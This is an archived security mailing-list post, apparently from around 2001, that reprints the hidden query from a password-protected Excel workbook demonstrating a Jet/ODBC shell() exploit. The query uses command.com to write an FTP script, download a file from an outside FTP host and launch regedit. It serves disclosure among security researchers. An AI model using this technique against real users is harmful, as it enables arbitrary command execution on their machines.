All, Russ Cooper: > Well, with the module password protected it seems clear you're not out > to get that critique very quickly. Maybe if you'd let someone know the > details we'd be able to answer you. As it is, we're simply left with > what appears to be the same exploit. Below is the code from the workbook: [Code] SELECT shell('command.com /C echo user anonymous yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys [RAW Dump from the workbook from the SF web site] SELECT shell('command.com /C echo user anonymous yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit > c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt; *.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction s=0;Threads=3;UID=admin;UserCommitSync=Yes That will be enough information for people who want to create their own working demo. Ollie <% Ollie Whitehouse I.T Co-Ordinator - Delphis Consulting VOX : +44 (0)207 916 0200 (Switchboard) FAX : +44 (0)207 916 1620 (Main) FAX : +44 (0)870 0881837 (FAX - E-Mail) PGP : http://www.ombs.demon.co.uk/pgp.txt Tag : Who needs Windows2000 when you have OS/2? %>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:24 PDT